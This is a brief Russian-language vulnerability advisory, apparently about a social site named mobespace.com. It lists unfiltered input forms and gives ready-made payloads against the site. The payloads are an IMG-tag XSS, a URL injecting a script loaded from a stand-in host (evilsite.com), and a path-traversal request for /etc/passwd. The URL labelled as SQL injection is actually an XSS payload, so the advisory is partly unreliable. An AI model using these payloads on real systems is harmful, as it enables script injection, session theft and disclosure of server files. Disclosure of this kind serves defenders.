Уязвимость:
Формы ввода:
- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's
Все эти формы не проверяются до генерации ответов.
Так же возможно провести SQL-инъекцию. Это возможно из-за ошибки SQL
синтаксиса. Использование:
В форму вводу введите JavaScript код, например <IMG
SRC=javascript:alert('XSS')>.
SQL-Инъекция:
http://mobespace.com/index.php?browse=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]&q=&update=Search&page=search&search=Search+DataBase
RSS раскрытие директорий:
http://www.example.com/index.php?page=rss&uid=/../../../../etc/passwd/